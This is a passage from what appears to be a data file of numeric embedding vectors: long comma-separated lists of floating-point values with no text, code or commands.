,0.008533545,0.0006934526,-0.037259705,0.010410269,-0.014621769,0.020033846,0.0058652177,0.0051828683,0.014013547,-0.02577229,-0.006583854,0.021495394,-0.0103012575,-0.01948304,0.0037558463,-0.012273552,-0.012492715,-0.010516465,-0.0032226634,-0.02456323,0.0063908715,0.005915963,0.005115336,-0.0056135766,-0.02873478,-0.00043405045,-0.011254778,-0.021291139,-0.011851277,-0.16010989,0.0035336337,-0.0031338246,-0.035648353,0.026045632,0.011163578,0.0005182164,-0.0034644776,-0.0033568994,-0.019781997,-0.010069061,-0.00086439244,0.00585577,0.0035612232,-0.0066123707,-0.005664553,-0.00016185542,-0.004306956,0.0038978327,-0.0022814272,-0.0023460349,-0.012639513,-0.016524559,-0.0022052238,0.007729282,0.013340728,-0.002767447,0.025775772,-0.007924683,0.01643396,-0.0005370987,0.030046137,-0.013303371,-0.0031610301,-0.02505176,-0.024922622,-0.012945075,0.017446265,-0.007027119,-0.0032104312,-0.009511532,-0.004509048,0.009575361,0.01745731,-0.016511103,0.008612943,-0.0021327503,0.017351303,0.00017310285,0.009360324,0.038326174,0.023089001,-0.030626051,-0.008630491,0.0020808456,0.00977098,-0.023425315,-0.0149357775,0.0034816433,-0.0078220125,-0.0013565319,-0.017809866,-0.0033085789,-0.015702033,0.03788344,-0.01919611,0.003686401,-0.018403567,0.0026410653,-0.016757341,-0.007079722,0.014502816,0.012867454,-0.02603388,0.012724969,0.024857683,-0.018047703,-0.0034269227,-0.008200642,-0.021422224,-0.021282127,-0.02334367,0.0032869917,-0.010966234,0.007605401,0.012084701,0.008309688,-0.012877099,-0.011353366,-0.0049813543,0.027654853,0.0102483025,0.01672533,0.008084744,-0.0063726096,0.01585243,0.010302165,0.009055233,-0.03469688,0.031111918,-0.013786042,-0.0059991013,-0.013054608,0.0060079927,-0.022078747,0.0126893595,-0.006909175,-0.01126652,-0.015529644,0.009139355,-0.010772789,0.011562583,0.004397739,-0.020846063,-0.0246563,-0.037417896,0.024890032,0.01656714,-0.009150787,-0.0002204449,-0.027160188,-0.022653127,-0.021111768,0.0039938563,0.04551778,-0.017993027,-0.04641534,-0.000731384,0.005133164,-0.011581928,-0.0012557888,0.012149772,-0.009466492,0.0023098246,-0.004168437,0.01276179,0.013480616,-0.024452168,-0.048269227,0.011073403,0.000107151754,-0.023263218,-0.0030541492,-0.012207511,0.011245876,-0.009045896,0.016785087,-0.019494934,0.016510185,-0.021221114,-0.0154703595,0.036261495,-0.01641659,-0.036512386,-0.03584628,0.096972615,-0.019990606,-0.021185648,0.014907144,-0.016862804,0.024050383,0.036738053,-0.0045217047,-0.016102124,-0.012032216,-0.031265352,-0.009467814,-0.008681382,0.026481781,0.008516928,0.015269605,0.0045949207,-0.000486303,0.00053584116,0.00780316,0.0042588795,-0.0235637,-0.014286583,0.021639334,0.018471237,0.0007488398,-0.01483573,0.012280605,-0.011404807,0.0074159363,-0.018961085,0.011767736,-0.010192187,-0.014708833,0.008695715,-0.07733765,-0.016212564,0.011064047,0.003994619,-0.007747795,0.009957485,0.0034834559,0.015310169,-0.005190161,0.024196334,-0.0028983727,-0.013987569,0.020573027,-0.0015195564,0.0077907294,-0.007404315,0.020424983,-0.012031431,-0.024257831,-0.0055969255,-0.03408742,0.014832895,-0.00454602,-0.0064600585,-0.00788673,0.018385043,-0.0009855409,0.004259146,0.018523417,-0.0019729831,0.015437413,-0.0024669443,0.01540493,0.008371093,0.024668409,-0.008593876,0.0060659535,-0.000586528,0.035551175,0.004124326,-0.0046488,-0.031894226,0.004664978,-0.013579522,-0.00058948324,-0.010589386,0.0019359179,0.0014964923,0.023508681,-0.028036479,-0.06634149,0.0035365245,-0.0073583648,-0.023424966,-0.0011645134,0.02871398,0.015124634,-0.01053918,0.0045872116,0.003841498,-0.01232781,0.00091145176,0.0023261043,0.028732423,-0.0037707677,-0.012387758,0.017490417,-0.020787168,-0.013739157,-0.02189205,-0.019160205,0.0027256436,-0.020752216,-0.0069358665,-0.01648769,-0.008183563,0.009060229,0.012556428,-0.011168632,-0.008841963,0.04781811,-0.024428846,-0.004668049,0.007948014,-0.015853396,-0.0004645757,-0.018389495,0.0036341264,-0.003346864,0.06508719,-0.008798745,0.0005092971,-0.0050325817,0.0068113403,0.0037018787,-0.019446597,0.04423393,-0.006040742,0.027750557,0.0043272953,-0.012623162,0.0301365,0.011101082,0.005363028,-0.0011265666,0.023043204,0.009516252,-0.017421208,-0.015656782,0.003368003,0.006401904,0.008853378,-0.0050425427,-0.00029333294,0.004567157,0.0044027423,-0.0100760395,-0.0028471432,0.0029024913,0.0050929803,-0.010898704,-0.035574436,-0.00183252,0.00005511799,-0.0055017546,-0.016260944,-0.0017435828,-0.004456864,-0.020627031,-0.010804245,0.024367308,0.017736122,-0.0026820863,-0.0041826325,0.0016333598,0.007399789,-0.008165325,-0.012726036,-0.005779923,0.001042969,0.0071459874,0.015221579,-0.0025765174,-0.014061942,0.016855782,0.024844047,0.023406608,-0.024234282,0.00072774984,0.010084326,-0.021830512,-0.003996639,0.010469978,0.013889598,0.0055057113,-0.00999009,0.017056068,-0.0008801713,-0.01889434,0.010937702,0.0036359192,0.016784593,-0.0025955874,0.011653125,0.011895703,-0.0039133523,0.02779312,0.0015994803,-0.04062323,0.008511692,-0.0060312496,-0.021692686,0.009551695,-0.02093229,-0.001409113,-0.01557416,0.011417493,-0.0034987899,0.0032820178,0.0061717015,0.011835801,0.0022785715,0.010463486,-0.0068608434,-0.011447476,0.0054984554,-0.011975674,-0.019384565,0.01469003,-0.037081067,0.008997514,0.008583037,0.09752424,-0.005973277,-0.007318209,0.0024712842,0.030670749,0.009426759,0.014826003,0.00095212687,0.012946426,-0.009216499,-0.0045219366,-0.022528928,-0.0023440162,0.011711064,0.011312386,-0.0073591988,-0.013820572,-0.0035907421,-0.031860445,0.0005392991,-0.009185394,-0.00089570135,-0.014197156,-0.016424296,0.006451374,-0.0512373,-0.0065543004,-0.003945246,-0.019651469,0.015689977,-0.0063309465,-0.012406238,0.014971412,-0.011329432,0.0016877651,0.0062618456,0.00069538516,0.0011789601,-0.020084891,-0.0048771156,-0.0128777195,-0.00288844,-0.0025562588,-0.034896724,-0.0018159703,-0.018296845,0.0035043475,0.0027349326,-0.00041690771,0.0152748935,-0.016527556,0.03940991,-0.010935739,0.005728105,0.02591562,0.005344207,0.0022292165,-0.015853308,-0.004197113,0.02271238,-0.009102063,-0.0031492247,-0.00032430014,-0.020307949,-0.0006666821,0.00856119,0.0031863688,-0.025894936,-0.006271742,0.0004744325,-0.0032868132,0.050533175,0.020531205,-0.0023745939,0.013740793,-0.011368881,0.016022546,0.010588529,-0.004803442,0.00989099,-0.023890885,-0.005825959,-0.011706789,0.010855087,-0.0087894555,-0.001071841,-0.030792344,-0.012750108,-0.0074442457,-0.014054163,-0.00026852122,-0.0022328156,-0.0075045326,-0.011643455,0.0013971231,0.0092093265,0.011104363,0.017694518,0.00085086195,-0.028424433,0.019084474,0.0016796192,0.015144187,-0.012014189,-0.018030472,-0.012649977,-0.12494237,0.010408844,-0.012368513,-0.020328373,-0.019801546,-0.011119736,0.024835244,0.07710022,0.015135927,-0.0835955,0.016196227,0.018181704,0.028674064,0.0042749355,0.0006885899,0.029637795,0.009766566,-0.017833322,-0.007139504,0.0018223363,0.016498381,0.014907354,0.0071243066,-0.008392855,-0.0019063507,0.023789054,-0.022295794,-0.0028488128,0.008854298,0.010963427,0.01346884,0.015747316,-0.020129874,-0.00008821724,-0.007467567,-0.002413326,-0.015335897,0.017667452,-0.0050769765,0.01507697,0.00090966525,-0.017376646,-0.0058070933,0.03424358,0.00048142325,0.012542335,0.01727325,-0.0019405673,0.023540348,0.0019804528,0.0076366803,-0.0020644555,0.028092759,0.012561992,-0.004900994,0.012649229,-0.023756573,0.03435901,0.012718943,-0.017811807,0.021603383,0.025115835,0.016408883,0.000982848,0.0010055713,-0.011996441,-0.008550404,-0.009770589,-0.014135178,-0.0030313171,-0.023460329,0.0068854894,-0.00378417,-0.00003928081,-0.012740214,0.0072862706,0.01571757,0.01981724,0.013195213,0.025062319,-0.020586666,0.0020333729,-0.0008633127,0.021279529,-0.004261567,0.01432607,0.008230966,-0.0025914384,-0.0050520874,-0.013172911,0.012686798,-0.0029365893,-0.018443134,0.007624971,0.02776948,0.009584938,-0.0024730854,0.020639164,0.009237468,0.02020468,-0.0046772053,-0.0077748033,-0.014843343,-0.0040369625,-0.10375532,-0.0039205058,0.030234633,-0.010985882,0.0046843244,-0.0048932354,-0.0012438056,0.0066303625,0.023964636,-0.01158214,-0.0058575505,0.015608278,0.02502707,0.011046734,-0.014018512,0.016247489,-0.037908904,0.012349913,0.0025673236,-0.0037300128,0.0026900691,0.00028699753,-0.027308434,-0.010250707,0.0034357915,-0.011001726,0.011807611,0.009897677,0.043239273,-0.00884037,-0.0023494475,0.009461465,-0.008390871,-0.011777357,-0.0009759709,-0.016052159,-0.01995126,-0.011376895,-0.002568945,0.022407414,0.0002393542,-0.01039441,-0.0027098025,0.006639675,0.0007757515,0.009161714,0.0003129236,0.0040716873,0.026732683,0.004824237,-0.011486265,-0.0026586226,0.0046805,0.004767973,0.0040895487,-0.026937246,-0.01817461,-0.021856321,-0.0070879865,0.020346802,-0.012506953,0.02465501,-0.0019143526,-0.019125704,-0.016323514,0.022725238,-0.003942368,0.008631493,-0.0038487003,0.0038302334,-0.027943099,0.0049184365,0.026991522,0.015001681,0.01943938,0.025045263,-0.0007450826,0.02082907,0.013736837,-0.019127553,-0.004866983,0.007590557,-0.031093214,0.01581941,-0.0038814945,0.004082609,0.008731884,0.033026353,-0.0037452213,0.029894838,-0.005051436,0.025449777,-0.025590364,-0.0058028917,0.022111218,0.012469479,0.016058154,-0.0002747122,-0.008691073,0.0002089659,-0.022851322,-0.008328336,-0.00092533685,-0.008517576,-0.012762239,-0.0011543578,-0.012124026,0.009320972,-0.015651355,0.018235028,0.019071274,0.023772864,-0.00185187,0.019157123,-0.027558988,-0.014279379,0.00930002,-0.0075744432,0.00066751253,0.012933877,-0.011497389,0.0022528428,-0.005677055,0.0025836912,-0.03079696,0.006775135,-0.020089561,0.012384187,0.008115883,-0.006298891,-0.00071095175,0.004921257,0.017892912,-0.039985687,-0.01099023,0.0101494575,0.021799535,-0.01142823,0.012233552,0.002160306,0.020715076,0.010134535,0.015154989,0.017257862,-0.006764638,-0.0070462488,-0.0019794006,0.015117006,0.0069712414,0.015132003,-0.022446351,-0.0032123597,0.0042460877,0.0025840928,-0.01739599,0.006566611,-0.011884326,-0.012306033,0.0054345196,-0.014619712,0.021505706,-0.00990418,0.0025035,-0.022257382,0.0028057024,-0.0061692,0.022677438,-0.0015096131,0.0045866277,-0.0069921305,0.01233904,-0.0050943643,0.005886193,-0.025662329,0.019665806,0.014204314,0.012222663,0.052932054,0.0019675104,0.022386122,0.014243416,-0.0037788646,-0.01575344,-0.004597717,0.024746232,0.000040822237,-0.009816934,-0.004384817,-0.012093133,0.004990042,0.008203447,-0.00030273938,-0.0015421376,0.0069894567,0.00537343,0.00060103764,-0.0053659603,0.016610542,0.01837443,-0.0029278467,-0.0046311305,0.020714628,0.021154622,-0.015562821,0.005836651,0.02082486,0.0047271876,0.02205321,0.023079105,-0.010562507,-0.022838315,-0.022435468,-0.010592032,0.009406794,-0.0045273914,0.044736773,-0.010322233,-0.02945979,0.008766056,0.0017388865,0.010569661,-0.023689916,0.013189623,-0.012228236,-0.0050798324,0.030972354,-0.0013503028,0.0030115112,-0.006388011,-0.00061032706,0.0050921454,0.0041350275,-0.000501102,-0.0026799794,-0.017527793,0.0131364735,0.004066124,-0.00078058406,0.018378697,-0.012125445,0.0085093165,0.006620113,-0.004486732,0.00857157,0.008371863,-0.0047032596,0.01679594,0.020046165,-0.0012463748,0.007225769,0.015221983,-0.012013399,-0.0035392495,0.0037341414,-0.013615857,0.00064047007,0.012176837,0.008643953,-0.017573303,0.027170647,-0.027095363,0.006734651,-0.007999757,0.005438985,0.0020545484,-0.0011314948,0.014449499,-0.020965073,-0.010399922,0.027293526,-0.015278025,-0.0021649227,0.01941156,0.013685093,0.04890462,-0.0038119443,-0.026045335,-0.008138723,-0.008359072,-0.0012936299,0.00712475,-0.019433444,0.0067516477,0.0064144987,0.015329352,0.0130928205,-0.015148939,-0.002321456,-0.009056962,0.005714989,0.026195368,0.008583653,0.0040884283,-0.022644095,-0.0066867247,0.016820494,0.03927738,-0.0045315903,-0.007015785,-0.021372763,0.017524747,-0.0075573544,0.009656908,0.018732892,-0.006357044,-0.02223543,0.0017168261,0.00859635,-0.015425448,-0.0049091424,0.008161762,-0.0013367074,-0.017617192,0.011128592,0.008173731,-0.0056449706,-0.0034595102,0.0015885625,-0.007912221,-0.0103420615,-0.0046025706,-0.028545847,0.014604663,-0.0060634096,0.000025158395,0.016145978,0.018208617,-0.019976836,0.00834759,-0.0059745503,0.03554822,0.06993081,-0.030641986,0.0058668912,0.020485908,0.017416194,0.007739312,0.021103859,0.015552928,0.013264711,0.013636581,0.007835003,-0.0035156314,-0.031028047,-0.0076621347,-0.0051680077,-0.0027830082,-0.014123588,0.032946657,0.013888974,-0.0126702655,-0.0032042158,0.0127028935,0.023024146,-0.021019747,-0.018523516,0.0037698483,-0.008216797,0.00015204753,0.019057598,-0.020178678,0.008534054,0.0024451122,-0.0010886795,-0.0021470934,0.0031766773,-0.003318143,0.004197819,-0.021587312,0.002371238,0.002220934,0.006348186,0.0014269395,-0.00056397426,-0.017529767,-0.07711835,0.005310651,0.02230372,-0.027407039,-0.011765547,0.0041446886,-0.01212626,0.0056946976,-0.003032707,0.010570719,-0.017387785,-0.02130053,-0.0116447555,0.006139863,0.012599366,-0.02378404,0.008308274,0.011726619,-0.0024862622,-0.0055139256,-0.015720783,0.020744158,0.008790666,-0.028979825,-0.005811178,0.000014391741,-0.010523628,0.0011437458,-0.0020903598,0.023098223,0.015304938,-0.0020852122,-0.019371865,-0.027032401,-0.005325529,0.011830672,0.0018613564,0.013352099,0.0014564359,-0.015152061,-0.012090154,0.01011916,0.023497218,-0.020472825,-0.0065451213,0.02532375,-0.023324069,0.014196806,-0.026116835,-0.003606693,0.04228784,0.0006490392,-0.013568362,0.030769303,-0.007474063,-0.010258211,0.012922647,-0.011975136,0.028479837,0.0029114243,-0.011794406,0.0027093096,0.024821432,-0.009072417,-0.0075957105,0.014797384,-0.014818791,0.01863193,-0.028684728,0.00097468775,0.02119255,-0.0023292045,-0.028504658,-0.007468092,-0.013264108,0.02258078,-0.010327631,0.0014065675,-0.010461609,0.0040270146,-0.016505055,-0.01629523,0.004164146,0.013729299,0.0055860304,0.0062709656,0.0077535403,0.012584909,0.018485583,0.018946396,-0.005413833,-0.010788819,-0.00586142,0.015956255,-0.0004144871,0.006895329,0.004412281,-0.008537613,0.0020847355,0.0151339555,-0.008480099,-0.0017819625,0.012424959,-0.0012067104,0.01232264,0.005881147,-0.008428524,-0.0007686277,-0.0016456449,-0.010337813,0.00072427536,0.016154202,0.029616313,-0.0020956465,-0.0053102905,-0.012916544,0.0034912291,0.0132189635,-0.01490407,0.021973142,-0.02921231,0.001752004,-0.018209836,-0.004617212,0.0060441503,-0.004430763,0.0022173908,-0.0042845155,0.0026691977,0.00023086822,-0.03282788,0.01656885,0.003853021,0.036488563,0.0036451363,0.00890876,0.028754132,0.0012785315,-0.018039435,0.012471531,-0.009139339,-0.032961346,0.010993608,-0.015754942,0.0063508907,0.019208584,0.0035323217,-0.0038653747,-0.008713429,-0.014830515,-0.0139199775,-0.006764612,-0.0011135913,-0.013387833,-0.014598647,0.0072675766,0.027507327,-0.011512876,-0.016279353,-0.011200553,-0.011026574,0.025604324,-0.0024983024,0.024767447,-0.016529242,0.0069461376,0.014702317,-0.015697407,-0.0052834144,-0.027333034,-0.01620091,-0.03337854,0.0023035416,-0.00078486925,-0.008733427,0.018983534,0.036137413,0.011201034,0.0023335842,0.0056051104,-0.014172985,-0.01424646,-0.0020165434,0.014327983,-0.012984138,-0.010775495,0.00089694594,-0.007071465,-0.0068672425,-0.016237915,-0.01649252,-0.006185762,0.0112493215,0.0060548615,-0.002581829,-0.011079945,0.001474735,-0.0043010986,-0.01074112,0.021446163,-0.011066373,0.0018073034,-0.002447596,0.019998744,0.022975087,0.0014292151,0.013554467,-0.012442258,-0.013248127,0.013285123,0.009727983,0.023221726,0.0035359783,0.1004874,0.021041133,-0.018412843,0.001246274,-0.005469478,-0.0064878836,0.031106722,-0.006964912,0.010957468,0.008981043,0.0099994065,-0.003248326,0.0034109994,0.005941588,-0.018890392,0.027086785,0.015561767,0.016085058,-0.008067102,-0.01221432,0.013362314,-0.026994491,-0.012315568,-0.002767514,0.009058487,-0.045715775,0.015847119,0.02269993,-0.0073620724,-0.0045170663,0.011235915,0.013266319,0.0073215324,0.0060000583,-0.030251484,-0.015825363,0.005435936,-0.009772388,-0.0020097592,-0.016439145,0.0057376404,0.012437067,-0.00910816,-0.007407909,-0.020254998,0.009541175,-0.00042426927,-0.0025809933,0.007637432,-0.008348114,0.03083053,0.018532133,0.015979897,-0.009712921,0.01066474,-0.009859458,0.01520151,-0.0047482853,0.02280283,0.0015090056,0.037696492,-0.013198494,0.003087405,0.0025257163,0.037433654,0.02085292,-0.016112268,-0.0055277646,-0.059766706,-0.024208313,0.023589103,-0.015224864,0.0058862,-0.0038397342,-0.031058192,0.005776873,-0.013768835,-0.011004939,-0.0061318274,-0.0130417785,0.005981367,0.019372787,0.0017251754,0.0032449532,0.013810458,0.010931084,-0.014064811,-0.008964635,0.0022591918,-0.013031633,0.009868402,-0.017273333,-0.00420219,0.011404659,-0.0009777013,-0.02201539,0.0141442185,-0.030805077,0.005943191,0.008051032,0.014363903,0.01061318,-0.007143537,-0.0057220175,-0.011048726,-0.007158964,0.016507931,0.008346448,0.025765708,0.0027434542,-0.0043465197,0.014735051,0.018254125,0.016953772,-0.016061291,-0.018601883,0.00052414654,-0.036553513,0.024939358,-0.01502276,0.016908873,0.009461453,0.015988069,0.03268279,0.00721484,0.019168232,-0.0037977148,0.016333442,0.01293369,-0.02544649,-0.013002803,-0.01829123,-0.025738899,-0.019783946,-0.0025520881,0.008580921,0.034124263,0.0037509252,0.0003357811,0.011240672,0.000049316273,0.005610853,-0.02852627,-0.013247056,-0.009719666,0.0127366325,0.043716412,-0.01223073,0.014952355,0.012389824,-0.020563077,0.02285855,0.0003119378,-0.004661277,-0.0005842361,-0.011960799,0.005855287,0.006534564,-0.015282968,-0.00040936732,0.006436415,0.008663069,0.011451368,-0.04346146,0.006652733,0.0030548323,0.01048299,-0.0051496453,0.0056365416,-0.015109148,-0.020191753,-0.021439007,-0.0065735904,-0.0013049642,-0.0062634666,-0.020985775,0.021193879,0.004226496,-0.01370195,-0.0019383373,0.016503833,0.010487569,-0.008484386,0.008630863,-0.006324241,-0.017380983,-0.0030220689,-0.0075572347,0.007922067,0.048804123,-0.020978156,0.031161482,-0.0005760899,0.005480086,0.0035772324,-0.0025077113,-0.010939733,0.042410463,-0.00845502,-0.05428131,0.0009370895,-0.0006439468,-0.0040838565,0.0033512602,0.01703101,-0.005570114,0.00041432635,-0.010936988,-0.0043742997,-0.0086674,0.012777708,0.0170903,0.005351579,0.004727291,-0.002915147,-0.0020542964,-0.018380245,-0.0032776098,-0.0045485753,0.031219946,-0.014270406,-0.008502127,-0.018066764,0.01248237,0.0045122122,-0.020379825,-0.020695616,0.017148243,0.008431226,-0.020667225,0.006882185,-0.006589712,-0.016696213,-0.0108830165,0.009436946,0.0010971788,0.02550553,0.01831018,-0.023046728,0.011689275,0.0050740847,0.0019301286,-0.011004185,0.020656176,-0.026294742,-0.004834559,0.016592618,-0.0031086353,-0.007822667,-0.023430556,-0.020732936,0.005770817,-0.007886011,-0.0061868164,-0.035299364,-0.022389323,-0.012363894,0.005915946,0.00921823,-0.009206839,0.0071156784,0.0061021545,0.0027046571,0.016283438,-0.009345161,-0.005206846,0.01791026,-0.0032299978,-0.018903812,-0.017356087,-0.0073409933,-0.008345295,-0.018123046,-0.007782566,-0.03580159,0.002590769,-0.019994989,0.00068185676,0.001800587,0.026829815,-0.010014619,-0.015668085,0.021313671,-0.0139636705,-0.014628111,0.004807686,0.0204144,0.030941255,0.07485215,-0.03776873,0.004289738,0.038633462,0.0000144017595,-0.009543327,0.02369264,-0.011593253,-0.054496463,-0.02660765,0.028409168,0.0018038488,0.003437049,-0.0050089895,0.026950011,-0.0030721822,-0.017253272,-0.0060655815,-0.007934576,-0.014499646,-0.0131031,0.03909966,-0.0017681227,0.00029274874,-0.0035218005,-0.008540846,-0.010361214,-0.0070775063,-0.00877836,0.02076365,0.00092359557,0.016484937,0.0121420575,-0.026773049,0.002975609,-0.005848729,0.0061788876,-0.013997491,0.022411384,-0.006494769,-0.007868742,-0.026244942,0.0151433945,-0.034346644,0.007931667,-0.0047987723,-0.012315693,-0.0004213208,-0.00012412354,0.16041775,0.00072638795,-0.0042614564,-0.0013917722,0.005493948,0.015065542,-0.02594919,-0.003509177,-0.0011476096,0.026743682,-0.0072661247,0.00024040697,0.013213567,0.02911874,0.033115536,-0.009457918,0.0056733703,0.15397546,0.0055121374,-0.0058974223,0.008287841,0.002113516,0.0183982,0.017596008,0.010365516,-0.021653472,0.010206327,-0.033212576,0.0080391485,-0.012920789,-0.0019928066,0.014374843,-0.020702519,0.025349414,0.01744452,0.01873226,-0.02625377,-0.008711408,-0.017991813,-0.0047948905,0.0013184156,-0.0071830414,0.0010664606,0.01384577,0.012036975,0.0059139105,-0.005119278,-0.006595755,0.018619986,0.030544449,-0.01053365,-0.0065925824,0.016429452,-0.00851668,0.021535365,0.00047255857,0.0008715738,-0.0084892195,-0.014616258,0.0058659697,0.011527474,-0.0066025555,-0.02129044,0.005135894,-0.009315947,-0.0070059714,0.0014587927,-0.0080214385,-0.03083754,0.003384193,0.014006123,-0.00827904,-0.019930817,0.008112178,-0.012109186,0.0042142733,-0.012635252,-0.0014786082,0.021723567,-0.005773138,0.0052778823,0.03232945,-0.011418909,0.0060833474,-0.008020449,-0.007858712,0.03062134,0.0018411339,0.00868522,0.014123405,-0.009998187,-0.0011452032,-0.008967109,-0.014220722,-0.015106378,0.029150749,-0.011784212,0.0055696047,-0.021554207,-0.032276154,-0.022743672,-0.00051428494,0.006316807,0.01608531,0.022263052,0.025342185,-0.00052739924,0.0057881474,-0.011070845,0.003771777,0.021126734,-0.004211568,-0.009386961,0.013818245,0.0021800122,-0.013633781,-0.008099195,0.011369381,-0.02720793,-0.00075085094,-0.013352232,-0.021178676,0.021817308,-0.00069944176,-0.020042079,0.011580537,-0.0038737715,0.012915005,-0.02014904,-0.002435133,-0.006044554,0.00489701,0.0036010991,-0.0008055051,0.01721447,-0.0077825957,0.012559005,-0.012449738,-0.00658274,-0.0042345473,-0.0039317566,0.022438046,0.006557812,0.012988138,-0.0010651116,0.0035470254,0.009116743,-0.00018438954],[0.004213277,0.0030709011,0.003122647,-0.008932553,-0.008118865,-0.018903881,-0.014203163,0.027984858,0.009714589,-0.014160181,-0.005130823,0.019029435,-0.0115372585,0.004451777,0.0011529564,0.012067747,0.015488192,-0.0015627386,0.01508344,-0.011297593,-0.0051700063,-0.016341899,0.006953399,0.009829279,0.031959746,0.012569292,0.005412703,-0.013444327,-0.0020073748,0.00012903808,0.020125106,0.013610263,0.0009308803,-0.0258973,0.017068867,0.02985497,-0.004296491,-0.0066006696,0.0039785295,-0.011267306,0.0059799645,0.00043782202,-0.001018004,0.01682925,-0.00486105,-0.013694922,0.0059203976,-0.017911676,-0.01895936,-0.0000516463,-0.0050120857,-0.00053445355,0.003200256,0.009944024,-0.0070111807,0.005911783,-0.00888501,-0.02811783,0.029361052,0.006729908,-0.011093916,0.014753763,-0.01319052,-0.0057957373,0.0231864,-0.005729365,-0.007231354,-0.0058145993,-0.006082554,-0.004353269,0.03328657,-0.0204432,0.014899239,-0.0080354605,0.00558779,0.022008257,-0.0037710408,-0.0046747257,0.0026641495,-0.016201206,-0.03482652,0.02079146,0.0014251372,-0.0028531374,-0.0029560684,-0.0020958094,0.0006824622,-0.013259227,0.0059089763,-0.010350994,-0.0041404488,-0.0050577186,0.003253628,0.017019723,0.011758118,0.0065348516,0.024064567,0.0036218187,-0.0070504844,-0.0037172062,-0.01732636,0.00023247827,-0.019298688,-0.0012906418,-0.0012490199,-0.00033585497,-0.01794611,0.01232343,-0.0030315218,-0.00059747195,-0.008735743,0.0175513,0.010274669,-0.0095617315,0.0066835238,-0.008238535,0.002168009,0.011194876,-0.022193845,0.0017133096,0.003922236,0.002252615,0.005052234,0.01402262,-0.0046191434,-0.006516897,-0.002077325,0.0011012786,-0.0026050329,-0.004390014,-0.013263547,0.0078067407,-0.0021544737,0.004973715,0.011945768,-0.0020554513,0.00092246104,0.014061415,0.0057734693,-0.016308574,0.012412655,0.0022307711,0.02228148,0.015860438,0.0046845875,0.0051783677,0.00079417526,0.010861685,0.0007626875,0.0034144178,0.023819031,0.010689298,-0.00018657421,-0.01156794,-0.011156595,0.0052524437,-0.012692753,-0.011774989,-0.018898845,0.017233158,0.0060563697,-0.014712868,-0.007315742,0.0394859,-0.008987725,-0.002537654,0.0053020623,0.016281977,-0.0011153219,0.00025719806,0.0061072367,0.022089308,0.00998617,0.0032147348,-0.006287497,-0.0058175325,0.011586141,-0.018248787,-0.009375042,0.03052685,-0.010663718,0.017593576,-0.011139637,-0.0072474554,0.0013818322,0.018266076,0.003837559,-0.00038305984,-0.005000224,0.0027201904,-0.008001583,-0.0056862957,-0.01841816,0.0013205038,-0.0024477507,-0.02450027,-0.00989718,0.120111644,-0.008372585,-0.007917086,-0.015381108,-0.011213374,0.004573467,-0.026849572,-0.02301003,0.000494887,-0.017243886,0.0030525539,0.010519559,-0.003646307,-0.015966447,-0.0065889326,0.023269244,0.0005411424,0.013418482,-0.0945815,0.014711535,0.017854523,-0.0020303219,0.016769463,0.0097505655,0.0014060374,0.0061455052,-0.012376373,-0.003259867,0.003322874,0.012376748,-0.012012483,0.00096776,-0.023341874,0.0042052437,0.00065530837,-0.03652616,0.00081828877,-0.015860206,-0.033953205,-0.0032850353,0.003482533,0.013560945,-0.0055621327,-0.02763731,0.010741095,0.006013021,-0.0071397135,-0.0074014296,-0.0016128101,0.008092141,-0.009136254,-0.00682304,-0.010507853,-0.0029625245,-0.0054401364,0.0033880088,0.020620719,-0.0075383745,-0.008624156,0.0071140532,0.021266647,-0.0047493465,0.024843318,0.007635628,0.013004059,-0.008796031,0.0059591634,0.016169628,0.012001975,0.015011891,-0.038934384,-0.013378491,-0.009463694,-0.026522517,-0.0071879555,0.009459255,-0.017999083,0.026348565,0.0024110728,0.011232439,0.010719424,0.0111542065,-0.013103206,-0.0001680135,-0.00012374565,-0.033516094,-0.009723685,-0.026052393,-0.011122968,0.023159675,0.004197824,0.013575671,0.005549116,-0.024596056,0.011986022,0.01249304,-0.004558875,-0.020628275,-0.004494156,-0.025237877,0.012162278,0.012724896,-0.005160947,0.012413128,-0.0011337965,0.013842826,-0.015126417,-0.007846482,-0.0038511623,0.004809047,0.005543772,0.010928233,0.011482571,0.0042571616,-0.0015642577,0.010961501,-0.017421756,0.006236022,0.0088565145,0.020811336,-0.013497867,-0.009494734,-0.0017701564,0.013521375,-0.017012121,-0.016002493,-0.005435863,-0.0033235995,-0.018376302,0.032931156,0.011729099,0.011502098,0.023836453,0.008170639,-0.00075447385,0.0118537275,0.025096292,-0.012536014,0.006024959,-0.007655172,0.019446885,0.0046448307,0.032506205,-0.014808979,0.0049039936,-0.01061808,0.015478071,-0.002442034,0.0126269525,-0.025540005,0.0011760877,0.017288107,0.013150221,-0.009126422,0.0022754038,-0.018935738,0.0040485053,-0.0026833485,-0.008442211,-0.009330778,-0.007396806,-0.015867187,-0.005376939,0.03262545,-0.00070959755,0.015353331,-0.00019387131,0.07272254,-0.006958604,0.0013711121,0.005273289,0.0147210695,-0.026406633,0.031081589,0.018793881,-0.00076125795,-0.017999662,-0.016263934,-0.030287532,0.0036927464,0.009560918,-0.013736229,0.0017809748,-0.013988113,0.015503825,-0.0063797445,-0.014315352,0.032432977,-0.011413587,-0.025672976,-0.009459595,0.038515456,0.020897668,0.011194744,-0.013715774,-0.005123711,-0.012441231,-0.010184312,-0.0065598562,-0.016240451,-0.0153475925,-0.01733947,0.012237231,0.015242561,-0.0049760216,-0.0062790443,-0.0070656925,-0.010396491,-0.0037251166,-0.002092166,0.02008153,-0.004329998,-0.0017616639,0.012354306,-0.0033669884,-0.007800591,0.005342106,-0.0117493095,0.01912001,-0.0148634715,0.012938788,-0.020620303,0.016395494,0.01175332,-0.0114160245,0.016515447,0.016990433,0.024915101,0.026840044,-0.036567405,0.022840075,-0.0028879086,0.056833856,-0.0027451364,-0.008103386,-0.023050139,-0.016664168,-0.0005142383,0.011001627,0.016225861,0.020129431,-0.004451685,-0.0025694554,-0.026685148,-0.011033294,-0.015637232,0.0029461929,0.007822831,0.017024582,0.004085979,0.014681382,-0.022059932,-0.006345686,0.0054053725,-0.01449278,0.008585725,-0.020008726,0.029411748,0.021978717,0.020114738,-0.011028239,0.00066678674,-0.019589227,0.0061163064,-0.004495044,-0.0021109118,0.013500399,-0.016964903,0.029214334,-0.004530544,-0.023135936,0.0006587083,0.01173461,-0.01136009,-0.008303862,-0.002222017,0.017994547,-0.0050525134,-0.0033666273,-0.017380374,0.006819567,0.009514573,0.008201926,0.020501358,-0.010408939,-0.01542211,0.013850217,0.018732527,0.0070814798,0.004376205,0.004171126,-0.023163622,0.020635877,-0.010353584,-0.012001235,-0.014942817,0.014315388,0.009953279,0.01835469,0.0071679573,-0.051723782,-0.019132167,0.0078096297,-0.0013982127,0.0129272,0.02963059,-0.005143148,0.005860223,0.007738524,0.018464569,0.023302706,0.007691471,0.00616074